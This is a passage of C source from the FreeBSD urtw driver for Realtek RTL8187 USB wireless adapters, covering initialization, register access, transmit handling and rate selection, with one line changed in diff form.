urtw_adapter_start_b(sc) : urtw_adapter_start(sc); if (error != 0) goto fail; /* reset softc variables */ sc->sc_txtimer = 0; if (!(sc->sc_flags & URTW_INIT_ONCE)) { ret = urtw_alloc_rx_data_list(sc); if (ret != 0) goto fail; ret = urtw_alloc_tx_data_list(sc); if (ret != 0) goto fail; sc->sc_flags |= URTW_INIT_ONCE; } error = urtw_rx_enable(sc); if (error != 0) goto fail; error = urtw_tx_enable(sc); if (error != 0) goto fail; if (sc->sc_flags & URTW_RTL8187B) usbd_transfer_start(sc->sc_xfer[URTW_8187B_BULK_TX_STATUS]); ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ifp->if_drv_flags |= IFF_DRV_RUNNING; callout_reset(&sc->sc_watchdog_ch, hz, urtw_watchdog, sc); fail: return; } static void urtw_init(void *arg) { struct urtw_softc *sc = arg; URTW_LOCK(sc); urtw_init_locked(arg); URTW_UNLOCK(sc); } static usb_error_t urtw_adapter_start_b(struct urtw_softc *sc) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) uint8_t data8; usb_error_t error; error = urtw_set_mode(sc, URTW_EPROM_CMD_CONFIG); if (error) goto fail; urtw_read8_m(sc, URTW_CONFIG3, &data8); urtw_write8_m(sc, URTW_CONFIG3, data8 | URTW_CONFIG3_ANAPARAM_WRITE | URTW_CONFIG3_GNT_SELECT); urtw_write32_m(sc, URTW_ANAPARAM2, URTW_8187B_8225_ANAPARAM2_ON); urtw_write32_m(sc, URTW_ANAPARAM, URTW_8187B_8225_ANAPARAM_ON); urtw_write8_m(sc, URTW_ANAPARAM3, URTW_8187B_8225_ANAPARAM3_ON); urtw_write8_m(sc, 0x61, 0x10); urtw_read8_m(sc, 0x62, &data8); urtw_write8_m(sc, 0x62, data8 & ~(1 << 5)); urtw_write8_m(sc, 0x62, data8 | (1 << 5)); urtw_read8_m(sc, URTW_CONFIG3, &data8); data8 &= ~URTW_CONFIG3_ANAPARAM_WRITE; urtw_write8_m(sc, URTW_CONFIG3, data8); error = urtw_set_mode(sc, URTW_EPROM_CMD_NORMAL); if (error) goto fail; error = urtw_8187b_cmd_reset(sc); if (error) goto fail; error = sc->sc_rf_init(sc); if (error != 0) goto fail; urtw_write8_m(sc, URTW_CMD, URTW_CMD_RX_ENABLE | URTW_CMD_TX_ENABLE); /* fix RTL8187B RX stall */ error = urtw_intr_enable(sc); if (error) goto fail; error = urtw_write8e(sc, 0x41, 0xf4); if (error) goto fail; error = urtw_write8e(sc, 0x40, 0x00); if (error) goto fail; error = urtw_write8e(sc, 0x42, 0x00); if (error) goto fail; error = urtw_write8e(sc, 0x42, 0x01); if (error) goto fail; error = urtw_write8e(sc, 0x40, 0x0f); if (error) goto fail; error = urtw_write8e(sc, 0x42, 0x00); if (error) goto fail; error = urtw_write8e(sc, 0x42, 0x01); if (error) goto fail; urtw_read8_m(sc, 0xdb, &data8); urtw_write8_m(sc, 0xdb, data8 | (1 << 2)); urtw_write16_m(sc, 0x372, 0x59fa); urtw_write16_m(sc, 0x374, 0x59d2); urtw_write16_m(sc, 0x376, 0x59d2); urtw_write16_m(sc, 0x378, 0x19fa); urtw_write16_m(sc, 0x37a, 0x19fa); urtw_write16_m(sc, 0x37c, 0x00d0); urtw_write8_m(sc, 0x61, 0); urtw_write8_m(sc, 0x180, 0x0f); urtw_write8_m(sc, 0x183, 0x03); urtw_write8_m(sc, 0xda, 0x10); urtw_write8_m(sc, 0x24d, 0x08); urtw_write32_m(sc, URTW_HSSI_PARA, 0x0600321b); urtw_write16_m(sc, 0x1ec, 0x800); /* RX MAX SIZE */ fail: return (error); #undef N } static usb_error_t urtw_adapter_start(struct urtw_softc *sc) { usb_error_t error; error = urtw_reset(sc); if (error) goto fail; urtw_write8_m(sc, URTW_ADDR_MAGIC1, 0); urtw_write8_m(sc, URTW_GPIO, 0); /* for led */ urtw_write8_m(sc, URTW_ADDR_MAGIC1, 4); error = urtw_led_ctl(sc, URTW_LED_CTL_POWER_ON); if (error != 0) goto fail; error = urtw_set_mode(sc, URTW_EPROM_CMD_CONFIG); if (error) goto fail; /* applying MAC address again. 
*/ urtw_write32_m(sc, URTW_MAC0, ((uint32_t *)sc->sc_bssid)[0]); urtw_write16_m(sc, URTW_MAC4, ((uint32_t *)sc->sc_bssid)[1] & 0xffff); error = urtw_set_mode(sc, URTW_EPROM_CMD_NORMAL); if (error) goto fail; error = urtw_update_msr(sc); if (error) goto fail; urtw_write32_m(sc, URTW_INT_TIMEOUT, 0); urtw_write8_m(sc, URTW_WPA_CONFIG, 0); urtw_write8_m(sc, URTW_RATE_FALLBACK, URTW_RATE_FALLBACK_ENABLE | 0x1); error = urtw_set_rate(sc); if (error != 0) goto fail; error = sc->sc_rf_init(sc); if (error != 0) goto fail; if (sc->sc_rf_set_sens != NULL) sc->sc_rf_set_sens(sc, sc->sc_sens); /* XXX correct? to call write16 */ urtw_write16_m(sc, URTW_PSR, 1); urtw_write16_m(sc, URTW_ADDR_MAGIC2, 0x10); urtw_write8_m(sc, URTW_TALLY_SEL, 0x80); urtw_write8_m(sc, URTW_ADDR_MAGIC3, 0x60); /* XXX correct? to call write16 */ urtw_write16_m(sc, URTW_PSR, 0); urtw_write8_m(sc, URTW_ADDR_MAGIC1, 4); error = urtw_intr_enable(sc); if (error != 0) goto fail; fail: return (error); } static usb_error_t urtw_set_mode(struct urtw_softc *sc, uint32_t mode) { uint8_t data; usb_error_t error; urtw_read8_m(sc, URTW_EPROM_CMD, &data); data = (data & ~URTW_EPROM_CMD_MASK) | (mode << URTW_EPROM_CMD_SHIFT); data = data & ~(URTW_EPROM_CS | URTW_EPROM_CK); urtw_write8_m(sc, URTW_EPROM_CMD, data); fail: return (error); } static usb_error_t urtw_8187b_cmd_reset(struct urtw_softc *sc) { int i; uint8_t data8; usb_error_t error; /* XXX the code can be duplicate with urtw_reset(). */ urtw_read8_m(sc, URTW_CMD, &data8); data8 = (data8 & 0x2) | URTW_CMD_RST; urtw_write8_m(sc, URTW_CMD, data8); for (i = 0; i < 20; i++) { usb_pause_mtx(&sc->sc_mtx, 2); urtw_read8_m(sc, URTW_CMD, &data8); if (!(data8 & URTW_CMD_RST)) break; } if (i >= 20) { device_printf(sc->sc_dev, "reset timeout\n"); goto fail; } fail: return (error); } static usb_error_t urtw_do_request(struct urtw_softc *sc, struct usb_device_request *req, void *data) { usb_error_t err; int ntries = 10; URTW_ASSERT_LOCKED(sc); while (ntries--) { err = usbd_do_request_flags(sc->sc_udev, &sc->sc_mtx, req, data, 0, NULL, 250 /* ms */); if (err == 0) break; DPRINTF(sc, URTW_DEBUG_INIT, "Control request failed, %s (retrying)\n", usbd_errstr(err)); usb_pause_mtx(&sc->sc_mtx, hz / 100); } return (err); } static void urtw_stop_locked(struct ifnet *ifp) { struct urtw_softc *sc = ifp->if_softc; uint8_t data8; usb_error_t error; ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); error = urtw_intr_disable(sc); if (error) goto fail; urtw_read8_m(sc, URTW_CMD, &data8); data8 &= ~(URTW_CMD_RX_ENABLE | URTW_CMD_TX_ENABLE); urtw_write8_m(sc, URTW_CMD, data8); error = sc->sc_rf_stop(sc); if (error != 0) goto fail; error = urtw_set_mode(sc, URTW_EPROM_CMD_CONFIG); if (error) goto fail; urtw_read8_m(sc, URTW_CONFIG4, &data8); urtw_write8_m(sc, URTW_CONFIG4, data8 | URTW_CONFIG4_VCOOFF); error = urtw_set_mode(sc, URTW_EPROM_CMD_NORMAL); if (error) goto fail; fail: if (error) device_printf(sc->sc_dev, "failed to stop (%s)\n", usbd_errstr(error)); usb_callout_stop(&sc->sc_led_ch); callout_stop(&sc->sc_watchdog_ch); urtw_abort_xfers(sc); } static void urtw_stop(struct ifnet *ifp) { struct urtw_softc *sc = ifp->if_softc; URTW_LOCK(sc); urtw_stop_locked(ifp); URTW_UNLOCK(sc); } static void urtw_abort_xfers(struct urtw_softc *sc) { int i, max; URTW_ASSERT_LOCKED(sc); max = (sc->sc_flags & URTW_RTL8187B) ? 
URTW_8187B_N_XFERS : URTW_8187L_N_XFERS; /* abort any pending transfers */ for (i = 0; i < max; i++) usbd_transfer_stop(sc->sc_xfer[i]); } static int urtw_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct urtw_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *) data; int error; int startall = 0; URTW_LOCK(sc); error = (sc->sc_flags & URTW_DETACHED) ? ENXIO : 0; URTW_UNLOCK(sc); if (error) return (error); switch (cmd) { case SIOCSIFFLAGS: if (ifp->if_flags & IFF_UP) { if (ifp->if_drv_flags & IFF_DRV_RUNNING) { if ((ifp->if_flags ^ sc->sc_if_flags) & (IFF_ALLMULTI | IFF_PROMISC)) urtw_set_multi(sc); } else { urtw_init(ifp->if_softc); startall = 1; } } else { if (ifp->if_drv_flags & IFF_DRV_RUNNING) urtw_stop(ifp); } sc->sc_if_flags = ifp->if_flags; if (startall) ieee80211_start_all(ic); break; case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; case SIOCGIFADDR: error = ether_ioctl(ifp, cmd, data); break; default: error = EINVAL; break; } return (error); } static void urtw_start(struct ifnet *ifp) { struct urtw_data *bf; struct urtw_softc *sc = ifp->if_softc; struct ieee80211_node *ni; struct mbuf *m; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) return; URTW_LOCK(sc); for (;;) { IFQ_DRV_DEQUEUE(&ifp->if_snd, m); if (m == NULL) break; bf = urtw_getbuf(sc); if (bf == NULL) { IFQ_DRV_PREPEND(&ifp->if_snd, m); break; } ni = (struct ieee80211_node *)m->m_pkthdr.rcvif; m->m_pkthdr.rcvif = NULL; if (urtw_tx_start(sc, ni, m, bf, URTW_PRIORITY_NORMAL) != 0) { ifp->if_oerrors++; STAILQ_INSERT_HEAD(&sc->sc_tx_inactive, bf, next); ieee80211_free_node(ni); break; } sc->sc_txtimer = 5; callout_reset(&sc->sc_watchdog_ch, hz, urtw_watchdog, sc); } URTW_UNLOCK(sc); } static int urtw_alloc_data_list(struct urtw_softc *sc, struct urtw_data data[], int ndata, int maxsz, void *dma_buf) { int i, error; for (i = 0; i < ndata; i++) { struct urtw_data *dp = &data[i]; dp->sc = sc; if (dma_buf == NULL) { dp->m = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (dp->m == NULL) { device_printf(sc->sc_dev, "could not allocate rx mbuf\n"); error = ENOMEM; goto fail; } dp->buf = mtod(dp->m, uint8_t *); } else { dp->m = NULL; dp->buf = ((uint8_t *)dma_buf) + (i * maxsz); } dp->ni = NULL; } return (0); fail: urtw_free_data_list(sc, data, ndata, 1); return (error); } static int urtw_alloc_rx_data_list(struct urtw_softc *sc) { int error, i; error = urtw_alloc_data_list(sc, sc->sc_rx, URTW_RX_DATA_LIST_COUNT, MCLBYTES, NULL /* mbufs */); if (error != 0) return (error); STAILQ_INIT(&sc->sc_rx_active); STAILQ_INIT(&sc->sc_rx_inactive); for (i = 0; i < URTW_RX_DATA_LIST_COUNT; i++) STAILQ_INSERT_HEAD(&sc->sc_rx_inactive, &sc->sc_rx[i], next); return (0); } static int urtw_alloc_tx_data_list(struct urtw_softc *sc) { int error, i; error = urtw_alloc_data_list(sc, sc->sc_tx, URTW_TX_DATA_LIST_COUNT, URTW_TX_MAXSIZE, sc->sc_tx_dma_buf /* no mbufs */); if (error != 0) return (error); STAILQ_INIT(&sc->sc_tx_active); STAILQ_INIT(&sc->sc_tx_inactive); STAILQ_INIT(&sc->sc_tx_pending); for (i = 0; i < URTW_TX_DATA_LIST_COUNT; i++) STAILQ_INSERT_HEAD(&sc->sc_tx_inactive, &sc->sc_tx[i], next); return (0); } static int urtw_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct urtw_data *bf; struct urtw_softc *sc = ifp->if_softc; /* prevent management frames from being sent if we're not ready */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { 
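/*
 * Editorial sketch (not part of this diff): urtw_do_request() above retries a
 * failed control request a bounded number of times with a short pause between
 * attempts (the real code sleeps via usb_pause_mtx() while holding the softc
 * mutex).  The same shape in isolation, with hypothetical callbacks:
 */
static int
sketch_retry(int (*issue)(void *arg), void (*pause_briefly)(void), void *arg,
    int max_tries)
{
	int err = -1;

	while (max_tries-- > 0) {
		err = issue(arg);
		if (err == 0)
			break;		/* request went through */
		pause_briefly();	/* back off before the next attempt */
	}
	return (err);
}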
m_freem(m); ieee80211_free_node(ni); return ENETDOWN; } URTW_LOCK(sc); bf = urtw_getbuf(sc); if (bf == NULL) { ieee80211_free_node(ni); m_freem(m); URTW_UNLOCK(sc); return (ENOBUFS); /* XXX */ } ifp->if_opackets++; if (urtw_tx_start(sc, ni, m, bf, URTW_PRIORITY_LOW) != 0) { ieee80211_free_node(ni); ifp->if_oerrors++; STAILQ_INSERT_HEAD(&sc->sc_tx_inactive, bf, next); URTW_UNLOCK(sc); return (EIO); } URTW_UNLOCK(sc); sc->sc_txtimer = 5; return (0); } static void urtw_scan_start(struct ieee80211com *ic) { /* XXX do nothing? */ } static void urtw_scan_end(struct ieee80211com *ic) { /* XXX do nothing? */ } static void urtw_set_channel(struct ieee80211com *ic) { struct urtw_softc *sc = ic->ic_ifp->if_softc; struct ifnet *ifp = sc->sc_ifp; uint32_t data, orig; usb_error_t error; /* * If the user sets a channel explicitly using ifconfig(8), this function * can be called before initialization has finished; in that case changing * the channel would fail, so do nothing until the device is running. */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) return; if (sc->sc_curchan != NULL && sc->sc_curchan == ic->ic_curchan) return; URTW_LOCK(sc); /* * While changing the channel we need to temporarily disable * TX. */ urtw_read32_m(sc, URTW_TX_CONF, &orig); data = orig & ~URTW_TX_LOOPBACK_MASK; urtw_write32_m(sc, URTW_TX_CONF, data | URTW_TX_LOOPBACK_MAC); error = sc->sc_rf_set_chan(sc, ieee80211_chan2ieee(ic, ic->ic_curchan)); if (error != 0) goto fail; usb_pause_mtx(&sc->sc_mtx, 10); urtw_write32_m(sc, URTW_TX_CONF, orig); urtw_write16_m(sc, URTW_ATIM_WND, 2); urtw_write16_m(sc, URTW_ATIM_TR_ITV, 100); urtw_write16_m(sc, URTW_BEACON_INTERVAL, 100); urtw_write16_m(sc, URTW_BEACON_INTERVAL_TIME, 100); fail: URTW_UNLOCK(sc); sc->sc_curchan = ic->ic_curchan; if (error != 0) device_printf(sc->sc_dev, "could not change the channel\n"); } static void urtw_update_mcast(struct ifnet *ifp) { /* XXX do nothing? */ } static int urtw_tx_start(struct urtw_softc *sc, struct ieee80211_node *ni, struct mbuf *m0, struct urtw_data *data, int prior) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211_frame *wh = mtod(m0, struct ieee80211_frame *); struct ieee80211_key *k; const struct ieee80211_txparam *tp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = ni->ni_vap; struct usb_xfer *rtl8187b_pipes[URTW_8187B_TXPIPE_MAX] = { sc->sc_xfer[URTW_8187B_BULK_TX_BE], sc->sc_xfer[URTW_8187B_BULK_TX_BK], sc->sc_xfer[URTW_8187B_BULK_TX_VI], sc->sc_xfer[URTW_8187B_BULK_TX_VO] }; struct usb_xfer *xfer; int dur = 0, rtsdur = 0, rtsenable = 0, ctsenable = 0, rate, pkttime = 0, txdur = 0, isshort = 0, xferlen; uint16_t acktime, rtstime, ctstime; uint32_t flags; usb_error_t error; URTW_ASSERT_LOCKED(sc); /* * Software crypto. */ - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { device_printf(sc->sc_dev, "ieee80211_crypto_encap returns NULL.\n"); /* XXX we don't expect fragmented frames */ m_freem(m0); return (ENOBUFS); } /* in case packet header moved, reset pointer */ wh = mtod(m0, struct ieee80211_frame *); } if (ieee80211_radiotap_active_vap(vap)) { struct urtw_tx_radiotap_header *tap = &sc->sc_txtap; /* XXX Are variables correct?
*/ tap->wt_flags = 0; tap->wt_chan_freq = htole16(ic->ic_curchan->ic_freq); tap->wt_chan_flags = htole16(ic->ic_curchan->ic_flags); ieee80211_radiotap_tx(vap, m0); } if ((wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) == IEEE80211_FC0_TYPE_MGT || (wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) == IEEE80211_FC0_TYPE_CTL) { tp = &vap->iv_txparms[ieee80211_chan2mode(ic->ic_curchan)]; rate = tp->mgmtrate; } else { tp = &vap->iv_txparms[ieee80211_chan2mode(ni->ni_chan)]; /* for data frames */ if (IEEE80211_IS_MULTICAST(wh->i_addr1)) rate = tp->mcastrate; else if (tp->ucastrate != IEEE80211_FIXED_RATE_NONE) rate = tp->ucastrate; else rate = urtw_rtl2rate(sc->sc_currate); } sc->sc_stats.txrates[sc->sc_currate]++; if (IEEE80211_IS_MULTICAST(wh->i_addr1)) txdur = pkttime = urtw_compute_txtime(m0->m_pkthdr.len + IEEE80211_CRC_LEN, rate, 0, 0); else { acktime = urtw_compute_txtime(14, 2,0, 0); if ((m0->m_pkthdr.len + 4) > vap->iv_rtsthreshold) { rtsenable = 1; ctsenable = 0; rtstime = urtw_compute_txtime(URTW_ACKCTS_LEN, 2, 0, 0); ctstime = urtw_compute_txtime(14, 2, 0, 0); pkttime = urtw_compute_txtime(m0->m_pkthdr.len + IEEE80211_CRC_LEN, rate, 0, isshort); rtsdur = ctstime + pkttime + acktime + 3 * URTW_ASIFS_TIME; txdur = rtstime + rtsdur; } else { rtsenable = ctsenable = rtsdur = 0; pkttime = urtw_compute_txtime(m0->m_pkthdr.len + IEEE80211_CRC_LEN, rate, 0, isshort); txdur = pkttime + URTW_ASIFS_TIME + acktime; } if (wh->i_fc[1] & IEEE80211_FC1_MORE_FRAG) dur = urtw_compute_txtime(m0->m_pkthdr.len + IEEE80211_CRC_LEN, rate, 0, isshort) + 3 * URTW_ASIFS_TIME + 2 * acktime; else dur = URTW_ASIFS_TIME + acktime; } USETW(wh->i_dur, dur); xferlen = m0->m_pkthdr.len; xferlen += (sc->sc_flags & URTW_RTL8187B) ? (4 * 8) : (4 * 3); if ((0 == xferlen % 64) || (0 == xferlen % 512)) xferlen += 1; memset(data->buf, 0, URTW_TX_MAXSIZE); flags = m0->m_pkthdr.len & 0xfff; flags |= URTW_TX_FLAG_NO_ENC; if ((ic->ic_flags & IEEE80211_F_SHPREAMBLE) && (ni->ni_capinfo & IEEE80211_CAPINFO_SHORT_PREAMBLE) && (sc->sc_preamble_mode == URTW_PREAMBLE_MODE_SHORT) && (sc->sc_currate != 0)) flags |= URTW_TX_FLAG_SPLCP; if (wh->i_fc[1] & IEEE80211_FC1_MORE_FRAG) flags |= URTW_TX_FLAG_MOREFRAG; flags |= (sc->sc_currate & 0xf) << URTW_TX_FLAG_TXRATE_SHIFT; if (sc->sc_flags & URTW_RTL8187B) { struct urtw_8187b_txhdr *tx; tx = (struct urtw_8187b_txhdr *)data->buf; if (ctsenable) flags |= URTW_TX_FLAG_CTS; if (rtsenable) { flags |= URTW_TX_FLAG_RTS; flags |= (urtw_rate2rtl(11) & 0xf) << URTW_TX_FLAG_RTSRATE_SHIFT; tx->rtsdur = rtsdur; } tx->flag = htole32(flags); tx->txdur = txdur; if ((wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) == IEEE80211_FC0_TYPE_MGT && (wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK) == IEEE80211_FC0_SUBTYPE_PROBE_RESP) tx->retry = 1; else tx->retry = URTW_TX_MAXRETRY; m_copydata(m0, 0, m0->m_pkthdr.len, (uint8_t *)(tx + 1)); } else { struct urtw_8187l_txhdr *tx; tx = (struct urtw_8187l_txhdr *)data->buf; if (rtsenable) { flags |= URTW_TX_FLAG_RTS; tx->rtsdur = rtsdur; } flags |= (urtw_rate2rtl(11) & 0xf) << URTW_TX_FLAG_RTSRATE_SHIFT; tx->flag = htole32(flags); tx->retry = 3; /* CW minimum */ tx->retry = 7 << 4; /* CW maximum */ tx->retry = URTW_TX_MAXRETRY << 8; /* retry limitation */ m_copydata(m0, 0, m0->m_pkthdr.len, (uint8_t *)(tx + 1)); } data->buflen = xferlen; data->ni = ni; data->m = m0; if (sc->sc_flags & URTW_RTL8187B) { switch (wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) { case IEEE80211_FC0_TYPE_CTL: case IEEE80211_FC0_TYPE_MGT: xfer = sc->sc_xfer[URTW_8187B_BULK_TX_EP12]; break; default: KASSERT(M_WME_GETAC(m0) < 
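/*
 * Editorial sketch (not part of this diff): urtw_tx_start() above sizes the
 * bulk transfer as the frame length plus a fixed descriptor allowance
 * (4 * 8 bytes on RTL8187B, 4 * 3 on RTL8187L) and then adds one pad byte
 * whenever the total lands exactly on a 64- or 512-byte boundary, presumably
 * so the transfer never ends on a full USB packet.  Hypothetical helper:
 */
#include <stdbool.h>

static int
sketch_tx_xferlen(int framelen, bool is_8187b)
{
	int xferlen = framelen + (is_8187b ? 4 * 8 : 4 * 3);

	if ((xferlen % 64) == 0 || (xferlen % 512) == 0)
		xferlen += 1;	/* avoid an exact multiple of the packet size */
	return (xferlen);
}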
URTW_8187B_TXPIPE_MAX, ("unsupported WME pipe %d", M_WME_GETAC(m0))); xfer = rtl8187b_pipes[M_WME_GETAC(m0)]; break; } } else xfer = (prior == URTW_PRIORITY_LOW) ? sc->sc_xfer[URTW_8187L_BULK_TX_LOW] : sc->sc_xfer[URTW_8187L_BULK_TX_NORMAL]; STAILQ_INSERT_TAIL(&sc->sc_tx_pending, data, next); usbd_transfer_start(xfer); error = urtw_led_ctl(sc, URTW_LED_CTL_TX); if (error != 0) device_printf(sc->sc_dev, "could not control LED (%d)\n", error); return (0); } static int urtw_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct ieee80211com *ic = vap->iv_ic; struct urtw_softc *sc = ic->ic_ifp->if_softc; struct urtw_vap *uvp = URTW_VAP(vap); struct ieee80211_node *ni; usb_error_t error = 0; DPRINTF(sc, URTW_DEBUG_STATE, "%s: %s -> %s\n", __func__, ieee80211_state_name[vap->iv_state], ieee80211_state_name[nstate]); sc->sc_state = nstate; IEEE80211_UNLOCK(ic); URTW_LOCK(sc); usb_callout_stop(&sc->sc_led_ch); callout_stop(&sc->sc_watchdog_ch); switch (nstate) { case IEEE80211_S_INIT: case IEEE80211_S_SCAN: case IEEE80211_S_AUTH: case IEEE80211_S_ASSOC: break; case IEEE80211_S_RUN: ni = ieee80211_ref_node(vap->iv_bss); /* setting bssid. */ urtw_write32_m(sc, URTW_BSSID, ((uint32_t *)ni->ni_bssid)[0]); urtw_write16_m(sc, URTW_BSSID + 4, ((uint16_t *)ni->ni_bssid)[2]); urtw_update_msr(sc); /* XXX maybe the below would be incorrect. */ urtw_write16_m(sc, URTW_ATIM_WND, 2); urtw_write16_m(sc, URTW_ATIM_TR_ITV, 100); urtw_write16_m(sc, URTW_BEACON_INTERVAL, 0x64); urtw_write16_m(sc, URTW_BEACON_INTERVAL_TIME, 100); error = urtw_led_ctl(sc, URTW_LED_CTL_LINK); if (error != 0) device_printf(sc->sc_dev, "could not control LED (%d)\n", error); ieee80211_free_node(ni); break; default: break; } fail: URTW_UNLOCK(sc); IEEE80211_LOCK(ic); return (uvp->newstate(vap, nstate, arg)); } static void urtw_watchdog(void *arg) { struct urtw_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; if (sc->sc_txtimer > 0) { if (--sc->sc_txtimer == 0) { device_printf(sc->sc_dev, "device timeout\n"); ifp->if_oerrors++; return; } callout_reset(&sc->sc_watchdog_ch, hz, urtw_watchdog, sc); } } static void urtw_set_multi(void *arg) { struct urtw_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; if (!(ifp->if_flags & IFF_UP)) return; /* * XXX don't know how to set a device. Lack of docs. Just try to set * IFF_ALLMULTI flag here. 
*/ ifp->if_flags |= IFF_ALLMULTI; } static usb_error_t urtw_set_rate(struct urtw_softc *sc) { int i, basic_rate, min_rr_rate, max_rr_rate; uint16_t data; usb_error_t error; basic_rate = urtw_rate2rtl(48); min_rr_rate = urtw_rate2rtl(12); max_rr_rate = urtw_rate2rtl(48); urtw_write8_m(sc, URTW_RESP_RATE, max_rr_rate << URTW_RESP_MAX_RATE_SHIFT | min_rr_rate << URTW_RESP_MIN_RATE_SHIFT); urtw_read16_m(sc, URTW_BRSR, &data); data &= ~URTW_BRSR_MBR_8185; for (i = 0; i <= basic_rate; i++) data |= (1 << i); urtw_write16_m(sc, URTW_BRSR, data); fail: return (error); } static uint16_t urtw_rate2rtl(uint32_t rate) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) int i; for (i = 0; i < N(urtw_ratetable); i++) { if (rate == urtw_ratetable[i].reg) return urtw_ratetable[i].val; } return (3); #undef N } static uint16_t urtw_rtl2rate(uint32_t rate) { #define N(a) ((int)(sizeof(a) / sizeof((a)[0]))) int i; for (i = 0; i < N(urtw_ratetable); i++) { if (rate == urtw_ratetable[i].val) return urtw_ratetable[i].reg; } return (0); #undef N } static usb_error_t urtw_update_msr(struct urtw_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint8_t data; usb_error_t error; urtw_read8_m(sc, URTW_MSR, &data); data &= ~URTW_MSR_LINK_MASK; if (sc->sc_state == IEEE80211_S_RUN) { switch (ic->ic_opmode) { case IEEE80211_M_STA: case IEEE80211_M_MONITOR: data |= URTW_MSR_LINK_STA; if (sc->sc_flags & URTW_RTL8187B) data |= URTW_MSR_LINK_ENEDCA; break; case IEEE80211_M_IBSS: data |= URTW_MSR_LINK_ADHOC; break; case IEEE80211_M_HOSTAP: data |= URTW_MSR_LINK_HOSTAP; break; default: DPRINTF(sc, URTW_DEBUG_STATE, "unsupported operation mode 0x%x\n", ic->ic_opmode); error = USB_ERR_INVAL; goto fail; } } else data |= URTW_MSR_LINK_NONE; urtw_write8_m(sc, URTW_MSR, data); fail: return (error); } static usb_error_t urtw_read8_c(struct urtw_softc *sc, int val, uint8_t *data) { struct usb_device_request req; usb_error_t error; URTW_ASSERT_LOCKED(sc); req.bmRequestType = UT_READ_VENDOR_DEVICE; req.bRequest = URTW_8187_GETREGS_REQ; USETW(req.wValue, (val & 0xff) | 0xff00); USETW(req.wIndex, (val >> 8) & 0x3); USETW(req.wLength, sizeof(uint8_t)); error = urtw_do_request(sc, &req, data); return (error); } static usb_error_t urtw_read16_c(struct urtw_softc *sc, int val, uint16_t *data) { struct usb_device_request req; usb_error_t error; URTW_ASSERT_LOCKED(sc); req.bmRequestType = UT_READ_VENDOR_DEVICE; req.bRequest = URTW_8187_GETREGS_REQ; USETW(req.wValue, (val & 0xff) | 0xff00); USETW(req.wIndex, (val >> 8) & 0x3); USETW(req.wLength, sizeof(uint16_t)); error = urtw_do_request(sc, &req, data); return (error); } static usb_error_t urtw_read32_c(struct urtw_softc *sc, int val, uint32_t *data) { struct usb_device_request req; usb_error_t error; URTW_ASSERT_LOCKED(sc); req.bmRequestType = UT_READ_VENDOR_DEVICE; req.bRequest = URTW_8187_GETREGS_REQ; USETW(req.wValue, (val & 0xff) | 0xff00); USETW(req.wIndex, (val >> 8) & 0x3); USETW(req.wLength, sizeof(uint32_t)); error = urtw_do_request(sc, &req, data); return (error); } static usb_error_t urtw_write8_c(struct urtw_softc *sc, int val, uint8_t data) { struct usb_device_request req; URTW_ASSERT_LOCKED(sc); req.bmRequestType = UT_WRITE_VENDOR_DEVICE; req.bRequest = URTW_8187_SETREGS_REQ; USETW(req.wValue, (val & 0xff) | 0xff00); USETW(req.wIndex, (val >> 8) & 0x3); USETW(req.wLength, sizeof(uint8_t)); return (urtw_do_request(sc, &req, &data)); } static usb_error_t urtw_write16_c(struct urtw_softc *sc, int val, uint16_t data) { struct usb_device_request req; 
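/*
 * Editorial sketch (not part of this diff): urtw_rate2rtl()/urtw_rtl2rate()
 * above do a linear search of urtw_ratetable[], which pairs net80211 rates in
 * 0.5 Mb/s units (2 = 1 Mb/s ... 108 = 54 Mb/s) with RTL8187 hardware rate
 * indices.  A standalone lookup of the same kind, with the same fallback:
 */
#include <stddef.h>
#include <stdint.h>

struct sketch_rate {
	uint16_t dot11;		/* rate in 0.5 Mb/s units */
	uint16_t hw;		/* hardware rate index */
};

static const struct sketch_rate sketch_rates[] = {
	{ 2, 0 }, { 4, 1 }, { 11, 2 }, { 12, 4 }, { 18, 5 }, { 22, 3 },
	{ 24, 6 }, { 36, 7 }, { 48, 8 }, { 72, 9 }, { 96, 10 }, { 108, 11 },
};

static uint16_t
sketch_rate2hw(uint16_t dot11)
{
	size_t i;

	for (i = 0; i < sizeof(sketch_rates) / sizeof(sketch_rates[0]); i++)
		if (sketch_rates[i].dot11 == dot11)
			return (sketch_rates[i].hw);
	return (3);	/* same fallback as the driver: index 3, i.e. 11 Mb/s */
}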
